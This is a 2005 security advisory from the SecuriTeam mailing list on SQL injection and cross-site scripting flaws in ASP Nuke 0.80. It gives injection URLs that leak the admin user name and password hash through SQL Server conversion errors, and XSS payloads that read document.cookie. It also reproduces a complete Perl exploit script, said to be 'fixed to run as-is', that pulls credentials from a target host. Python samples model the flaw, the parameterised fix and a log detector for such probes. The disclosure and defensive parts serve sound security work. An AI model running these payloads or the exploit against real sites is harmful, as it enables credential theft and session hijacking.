[NT] ASP Nuke Multiple SQL Injection and XSS Vulnerability

From: SecuriTeam (support_at_securiteam.com)
Date: 04/25/05

    To: list@securiteam.com
    Date: 25 Apr 2005 15:11:31 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

      ASP Nuke Multiple SQL Injection and XSS Vulnerability
    ------------------------------------------------------------------------

    SUMMARY

     <http://www.aspnuke.com/> ASP Nuke is "an open-source software
    application for running a community-based web site on a web server".

    Several ASP Nuke pages pass request parameters into SQL statements and
    into HTML output without validating or encoding them. Through the SQL
    injection an attacker can read, add, modify or delete data in ASP Nuke's
    database, including user names and password hashes; through the cross
    site scripting an attacker can run script in another user's browser in
    the context of the site.

    DETAILS

    Vulnerable Systems:
     * ASP Nuke version 0.80

    SQL Injection:
    ASP Nuke concatenates integer request parameters straight into SQL
    statements, so many pages are vulnerable to SQL injection. Two details
    shape the exploitation. First, the affected columns (tsk.TaskID,
    art.ArticleID) are integers, so the value is placed in the query without
    quotes: a payload needs no quote to break out, and a trailing "--"
    comments out the rest of the WHERE clause. Second, the ADO errors quoted
    below (0x80040E14, 0x80040E07) come from Microsoft SQL Server, and the page
    returns both the error text and the failing statement, which turns every
    failed query into an error-based oracle.

    Example #1:
    The following URL triggers an SQL syntax error in the comments.asp page,
    and the response discloses the whole statement:
    http://localhost/module/support/task/comments.asp?taskid='SQL_INJECTION

    Response:

    Error # -2147217900 (0x80040E14)
    Unclosed quotation mark before the character string 'SQL_INJECTION AND
    tsk.Active <> 0 AND tsk.Archive = 0'.
    SELECT tsk.TaskID, tsk.Title, tsk.Comments, tsk.PctComplete,
    usr.FirstName, usr.LastName, pri.PriorityName, sta.StatusName, 0 As
    CommentCount, tsk.Created FROM tblTask tsk INNER JOIN tblUser usr ON
    tsk.UserID = usr.UserID INNER JOIN tblTaskPriority pri ON pri.PriorityID =
    tsk.PriorityID INNER JOIN tblTaskStatus sta ON sta.StatusID = tsk.StatusID
    WHERE tsk.TaskID = 'SQL_INJECTION AND tsk.Active <> 0 AND tsk.Archive = 0

    Exploit:
    To get the username. The query joins tblUser as usr, so the unqualified
    column name Username resolves there; comparing it with the int column
    tsk.TaskID forces a varchar-to-int conversion, which fails and echoes the
    offending value in the error:
    http://localhost/module/support/task/comments.asp?taskid=Username--

    This would result in:
    Error # -2147217913 (0x80040E07)
    Syntax error converting the varchar value 'admin' to a column of data type
    int.
    SELECT tsk.TaskID, tsk.Title, tsk.Comments, tsk.PctComplete,
    usr.FirstName, usr.LastName, pri.PriorityName, sta.StatusName, 0 As
    CommentCount, tsk.Created FROM tblTask tsk INNER JOIN tblUser usr ON
    tsk.UserID = usr.UserID INNER JOIN tblTaskPriority pri ON pri.PriorityID =
    tsk.PriorityID INNER JOIN tblTaskStatus sta ON sta.StatusID = tsk.StatusID
    WHERE tsk.TaskID = Username-- AND tsk.Active <> 0 AND tsk.Archive = 0

    Here "admin" is a user name leaked from tblUser. Which user's value
    appears depends on which tblUser row SQL Server evaluates first; in the
    advisory's test it was admin.

    To get the password hash in the same way:
    http://localhost/module/support/task/comments.asp?taskid=Password--

    This would result in:
    Error # -2147217913 (0x80040E07)
    Syntax error converting the varchar value
    'f2349ef3f76a2d980586cb945a1973ba8e9579a9c9411c043be85583f444e015' to a
    column of data type int.
    SELECT tsk.TaskID, tsk.Title, tsk.Comments, tsk.PctComplete,
    usr.FirstName, usr.LastName, pri.PriorityName, sta.StatusName, 0 As
    CommentCount, tsk.Created FROM tblTask tsk INNER JOIN tblUser usr ON
    tsk.UserID = usr.UserID INNER JOIN tblTaskPriority pri ON pri.PriorityID =
    tsk.PriorityID INNER JOIN tblTaskStatus sta ON sta.StatusID = tsk.StatusID
    WHERE tsk.TaskID = Password-- AND tsk.Active <> 0 AND tsk.Archive = 0

    With "f2349ef3f76a2d980586cb945a1973ba8e9579a9c9411c043be85583f444e015"
    being the stored password hash: a 64-character hex digest, consistent
    with SHA-256. The value is hashed, not encrypted, so it has to be cracked
    offline rather than decrypted.

    Example #2:
    The same parameter is vulnerable in the detail.asp page:
    http://localhost/module/support/task/detail.asp?taskid='SQL_INJECTION

    Response:

    Error # -2147217900 (0x80040E14)
    Unclosed quotation mark before the character string 'SQL_INJECTION AND
    tsk.Active <> 0 AND tsk.Archive = 0'.
    SELECT tsk.TaskID, tsk.Title, tsk.Comments, usr.FirstName, usr.LastName,
    pri.PriorityName, sta.StatusName, 0 As CommentCount, tsk.Created FROM
    tblTask tsk INNER JOIN tblUser usr ON tsk.UserID = usr.UserID INNER JOIN
    tblTaskPriority pri ON pri.PriorityID = tsk.PriorityID INNER JOIN
    tblTaskStatus sta ON sta.StatusID = tsk.StatusID WHERE tsk.TaskID =
    'SQL_INJECTION AND tsk.Active <> 0 AND tsk.Archive = 0

    Exploit:
    To get the username:
    http://localhost/module/support/task/detail.asp?taskid=Username--

    This would result in:
    Error # -2147217913 (0x80040E07)
    Syntax error converting the varchar value 'admin' to a column of data type
    int.
    SELECT tsk.TaskID, tsk.Title, tsk.Comments, usr.FirstName, usr.LastName,
    pri.PriorityName, sta.StatusName, 0 As CommentCount, tsk.Created FROM
    tblTask tsk INNER JOIN tblUser usr ON tsk.UserID = usr.UserID INNER JOIN
    tblTaskPriority pri ON pri.PriorityID = tsk.PriorityID INNER JOIN
    tblTaskStatus sta ON sta.StatusID = tsk.StatusID WHERE tsk.TaskID =
    Username-- AND tsk.Active <> 0 AND tsk.Archive = 0

    With "admin" being the username, as in Example #1.

    To get the password hash:
    http://localhost/module/support/task/detail.asp?taskid=Password--

    This would result in:
    Error # -2147217913 (0x80040E07)
    Syntax error converting the varchar value
    'f2349ef3f76a2d980586cb945a1973ba8e9579a9c9411c043be85583f444e015' to a
    column of data type int.

    SELECT tsk.TaskID, tsk.Title, tsk.Comments, usr.FirstName, usr.LastName,
    pri.PriorityName, sta.StatusName, 0 As CommentCount, tsk.Created FROM
    tblTask tsk INNER JOIN tblUser usr ON tsk.UserID = usr.UserID INNER JOIN
    tblTaskPriority pri ON pri.PriorityID = tsk.PriorityID INNER JOIN
    tblTaskStatus sta ON sta.StatusID = tsk.StatusID WHERE tsk.TaskID =
    Password-- AND tsk.Active <> 0 AND tsk.Archive = 0

    With "f2349ef3f76a2d980586cb945a1973ba8e9579a9c9411c043be85583f444e015"
    being the stored password hash (SHA-256, as in Example #1).

    Example #3:
    The following URL triggers an SQL syntax error in the article.asp page.
    This query joins tblArticleAuthor rather than tblUser, so the
    Username-- / Password-- trick of the task pages does not carry over
    unchanged, and the advisory gives no exploit for this page:
    http://localhost/module/article/article/article.asp?articleid='SQL_INJECTION

    Response:

    Error # -2147217900 (0x80040E14)
    Unclosed quotation mark before the character string 'SQL_INJECTION AND
    art.Active <> 0 AND art.Archive = 0'.
    SELECT art.ArticleID, art.Title, art.ArticleBody, auth.FirstName,
    auth.LastName, cat.CategoryName, art.CommentCount, art.Created FROM
    tblArticle art INNER JOIN tblArticleAuthor auth ON art.AuthorID =
    auth.AuthorID INNER JOIN tblArticleToCategory atc ON atc.ArticleID =
    art.ArticleID INNER JOIN tblArticleCategory cat ON atc.CategoryID =
    cat.CategoryID WHERE art.ArticleID = 'SQL_INJECTION AND art.Active <> 0
    AND art.Archive = 0
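
    As an added illustration (not code from the advisory or from ASP Nuke),
    the following Python models the query construction that the three error
    messages above reveal, shows the validated and parameterised form that
    closes the hole, and parses the leaked value out of a conversion error
    the way the advisory's exploit relies on. The statement text is copied
    from the comments.asp error output; the function names and the two
    sample response bodies are constructed for this example.

```python
import re
from typing import Optional, Tuple

# Statement text copied from the comments.asp error output in the advisory.
# tsk.TaskID is an int column, so the page drops the request value in without
# quotes; {taskid} marks where the raw parameter lands.
COMMENTS_SQL = (
    "SELECT tsk.TaskID, tsk.Title, tsk.Comments, tsk.PctComplete, "
    "usr.FirstName, usr.LastName, pri.PriorityName, sta.StatusName, "
    "0 As CommentCount, tsk.Created "
    "FROM tblTask tsk "
    "INNER JOIN tblUser usr ON tsk.UserID = usr.UserID "
    "INNER JOIN tblTaskPriority pri ON pri.PriorityID = tsk.PriorityID "
    "INNER JOIN tblTaskStatus sta ON sta.StatusID = tsk.StatusID "
    "WHERE tsk.TaskID = {taskid} AND tsk.Active <> 0 AND tsk.Archive = 0"
)


def build_query_vulnerable(taskid: str) -> str:
    """Model of the page's behaviour: plain string concatenation."""
    return COMMENTS_SQL.replace("{taskid}", taskid)


def executed_sql(sql: str) -> str:
    """What the database actually parses: a '--' comments out the rest of the
    line, which is how the payloads drop the Active/Archive conditions."""
    return sql.split("--", 1)[0].rstrip()


TASKID_RE = re.compile(r"[0-9]{1,9}")


def is_valid_taskid(value: str) -> bool:
    """Hardened input check: a plain decimal integer and nothing else."""
    return TASKID_RE.fullmatch(value) is not None


def build_query_safe(taskid: str) -> Tuple[str, Tuple[int]]:
    """Hardened form: validate, then bind the value as a parameter instead of
    concatenating it (in ASP: an ADODB.Command with CreateParameter)."""
    if not is_valid_taskid(taskid):
        raise ValueError("taskid must be a positive integer")
    return COMMENTS_SQL.replace("{taskid}", "?"), (int(taskid),)


# ADO error codes quoted in the advisory.
SYNTAX_ERROR = "0x80040E14"      # "Unclosed quotation mark ..."
CONVERSION_ERROR = "0x80040E07"  # "Syntax error converting the varchar value ..."
LEAK_RE = re.compile(
    r"converting the varchar value '([^']*)' to a column of data type int")


def classify_response(body: str) -> Tuple[str, Optional[str]]:
    """Classify an error page the way the exploit relies on: a conversion
    error carries the leaked column value inside single quotes."""
    if CONVERSION_ERROR in body:
        match = LEAK_RE.search(body)
        return "leak", (match.group(1) if match else None)
    if SYNTAX_ERROR in body:
        return "syntax", None
    return "none", None


# Constructed response bodies modelled on the advisory's error output.
SAMPLE_SYNTAX_RESPONSE = (
    "Error # -2147217900 (0x80040E14)\n"
    "Unclosed quotation mark before the character string "
    "'SQL_INJECTION AND tsk.Active <> 0 AND tsk.Archive = 0'.\n"
)
SAMPLE_LEAK_RESPONSE = (
    "Error # -2147217913 (0x80040E07)\n"
    "Syntax error converting the varchar value 'admin' to a column of data "
    "type int.\n"
)

if __name__ == "__main__":
    for payload in ("'SQL_INJECTION", "Username--", "Password--"):
        print(repr(payload), "->", executed_sql(build_query_vulnerable(payload))[-45:])
    print(classify_response(SAMPLE_SYNTAX_RESPONSE))
    print(classify_response(SAMPLE_LEAK_RESPONSE))
    print(build_query_safe("12")[1])
    print(is_valid_taskid("Username--"))
```

    The validation step matters even with parameters bound: rejecting
    anything but a short decimal string keeps the int conversion inside the
    application, where the error is yours to handle, instead of letting SQL
    Server produce the verbose error that leaks the statement.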

    Cross Site Scripting:
    The username parameter of profile.asp and the code parameter of select.asp
    are written back into the page without HTML encoding. The following URLs
    (each is a single line) demonstrate the vulnerability by injecting a
    script that displays the visitor's cookie:
    http://localhost/module/discuss/forum/profile.asp?topicid=1&thradid=346&username='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
    http://localhost/module/support/language/select.asp?code='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

    The payload decodes to '"><script>alert(document.cookie)</script>: the
    leading quote characters close whatever attribute the value is echoed
    into, and the script then runs in the site's origin, where it can read
    the ASP Nuke session cookie. The fix is to validate the parameters and to
    pass every reflected value through Server.HTMLEncode before writing it.
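
    From the defender's side, the probes above leave a clear trace in the IIS
    log: an integer parameter (taskid, articleid) that is not a number, or a
    parameter carrying script markup. The following Python, added here and
    not part of the advisory, runs that check over a constructed W3C-format
    log excerpt. The log lines, field list and client addresses are made up
    for the example; the URLs and payloads are the ones from this advisory.

```python
import re
from typing import Dict, Iterator, List
from urllib.parse import parse_qsl

# Constructed IIS W3C log excerpt (not a real capture): normal requests, the
# advisory's two task-page probes, and the profile.asp XSS payload.
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 6.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2005-04-25 13:10:01 10.0.0.5 GET /module/support/task/comments.asp taskid=12 200
2005-04-25 13:10:07 10.0.0.5 GET /module/support/task/comments.asp taskid=Username-- 500
2005-04-25 13:10:09 10.0.0.5 GET /module/support/task/detail.asp taskid=Password-- 500
2005-04-25 13:10:15 10.0.0.7 GET /module/discuss/forum/profile.asp topicid=1&thradid=346&username='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E 200
2005-04-25 13:11:02 10.0.0.9 GET /module/article/article/article.asp articleid=5 200
2005-04-25 13:11:30 10.0.0.9 GET /default.asp - 200
"""

# Parameters the advisory shows being compared against int columns.
INT_PARAMS = {"taskid", "articleid"}
XSS_RE = re.compile(r"<\s*script|javascript:|on\w+\s*=", re.IGNORECASE)
SQL_META_RE = re.compile(r"'|--|;|/\*")


def parse_w3c(text: str) -> Iterator[Dict[str, str]]:
    """Yield one dict per data line, keyed by the names in the #Fields: header."""
    fields = None
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#"):
            continue
        if fields is None:
            raise ValueError("log has no #Fields: header")
        values = line.split()
        if len(values) != len(fields):
            continue  # malformed line; skip rather than misalign columns
        yield dict(zip(fields, values))


def classify_param(name: str, value: str) -> str:
    """Return 'sqli', 'xss' or '' for one decoded query parameter."""
    if name.lower() in INT_PARAMS and not re.fullmatch(r"[0-9]+", value):
        return "sqli"  # anything but digits in an int parameter is tampering
    if XSS_RE.search(value):
        return "xss"
    if SQL_META_RE.search(value):
        return "sqli"
    return ""


def find_probes(text: str) -> List[Dict[str, str]]:
    """Scan a log and return one finding per suspicious parameter."""
    findings = []
    for rec in parse_w3c(text):
        query = rec.get("cs-uri-query", "-")
        if query == "-":  # IIS writes '-' for an empty query string
            continue
        for name, value in parse_qsl(query, keep_blank_values=True):
            kind = classify_param(name, value)
            if kind:
                findings.append({
                    "client": rec["c-ip"], "page": rec["cs-uri-stem"],
                    "param": name, "value": value, "kind": kind,
                    "status": rec["sc-status"],
                })
    return findings


def suspicious_clients(findings: List[Dict[str, str]]) -> List[str]:
    """Distinct source addresses behind the findings, sorted."""
    return sorted({f["client"] for f in findings})


if __name__ == "__main__":
    for f in find_probes(SAMPLE_LOG):
        print(f"{f['client']} {f['kind']:4} {f['page']} {f['param']}={f['value']!r} ({f['status']})")
    print("clients:", suspicious_clients(find_probes(SAMPLE_LOG)))
```

    In the constructed log the tampered taskid requests are followed by an
    HTTP 500, which is what an unhandled ADO error produces; treating a
    non-numeric integer parameter plus a 500 as a higher-confidence hit is an
    assumption of this example, since a site with custom error pages may
    answer 200 and the parameter check alone is still the reliable signal.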

    Exploit (Username and Password retrieval):
    #!/usr/bin/perl
    # ASP Nuke 0.80 comments.asp error-based SQL injection exploit, as posted
    # by Diabolic Crab. Fixed to run as-is: the two request strings had been
    # wrapped across lines by the mail, requests now use CRLF, the whole
    # response is read instead of only the first 1024 bytes, and the leaked
    # value is taken from the conversion-error text rather than from the first
    # quote character in the page.
    use strict;
    use warnings;
    use IO::Socket::INET;
    use Getopt::Std;

    print "[x]ASP NUKE 0.80 and below Comments.asp Sql Injection Exploit\n";
    print "[x]By Diabolic Crab\n";
    print "[x]http://www.digitalparadox.org\n\n";

    my %opt;
    getopts('h:p:', \%opt);
    my $host = $opt{h};
    die("[x] Usage: $0 -h <host> [-p <port>]\n") unless $host;
    my $port = $opt{p} || 80;

    print "[x] Host: $host\n";
    print "[x] Port: $port\n";

    # "--" comments out the rest of the WHERE clause; comparing usr.Username or
    # usr.Password with the int column tsk.TaskID makes SQL Server fail the
    # varchar-to-int conversion and echo the value in the 0x80040E07 error.
    my $path_user = '/module/support/task/comments.asp?taskid=Username--';
    my $path_pass = '/module/support/task/comments.asp?taskid=Password--';

    # One HTTP/1.0 request per value; the server closes the connection, so the
    # response can be slurped in full.
    sub fetch {
        my ($path) = @_;
        my $sock = IO::Socket::INET->new(Proto => 'tcp', PeerAddr => $host,
                                         PeerPort => $port)
            or die("Can't connect!");
        print $sock "GET $path HTTP/1.0\r\nHost: $host\r\n\r\n";
        local $/;
        my $body = <$sock>;
        close $sock;
        return defined $body ? $body : '';
    }

    # Pull the quoted value out of "Syntax error converting the varchar value
    # '...' to a column of data type int."
    sub leaked_value {
        my ($body) = @_;
        return $body =~ /varchar value '([^']*)'/ ? $1 : '(not found)';
    }

    print "[x]Username is: ", leaked_value(fetch($path_user)), "\n";
    print "[x]Password hash (SHA-256) is: ", leaked_value(fetch($path_pass)), "\n";

    #EOF

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:dcrab@hackerscenter.com>
    Diabolic Crab.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

